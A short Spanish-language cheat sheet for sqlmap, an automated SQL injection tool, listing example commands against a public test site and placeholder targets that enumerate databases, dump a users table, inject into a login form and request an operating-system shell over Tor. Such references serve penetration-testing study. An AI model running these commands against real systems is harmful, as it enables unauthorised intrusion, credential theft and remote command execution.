Herramienta automática para detectar y explotar vulnerabilidades de inyección SQL en aplicaciones web. Detecta el tipo de inyección [booleana ciega, basada en tiempo, basada en error, UNION, stacked queries, out-of-band], identifica el motor de base de datos [MySQL, PostgreSQL, MSSQL, Oracle, SQLite, etc.], puede extraer bases de datos, tablas, columnas y datos y puede escalar a lectura/escritura de ficheros del servidor o incluso ejecución de comandos del SO, si los privilegios de la BD lo permiten.
$ sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1"
$ sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs
$ sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --tables
$ sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --dump
$ sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --tor --os-shell
$ sqlmap -u "http://objetivo.local/login.php" --data="usuario=admin&clave=1234"
$ sqlmap -r peticion.txt --batch
$ sqlmap -u "http://objetivo.local/pagina.php?id=1" --level=5 --risk=3
$ sqlmap -u "http://objetivo.local/pagina.php?id=1" --cookie="PHPSESSID=abc123"
$ sqlmap -u "http://objetivo.local/pagina.php?id=1" --batch --dbs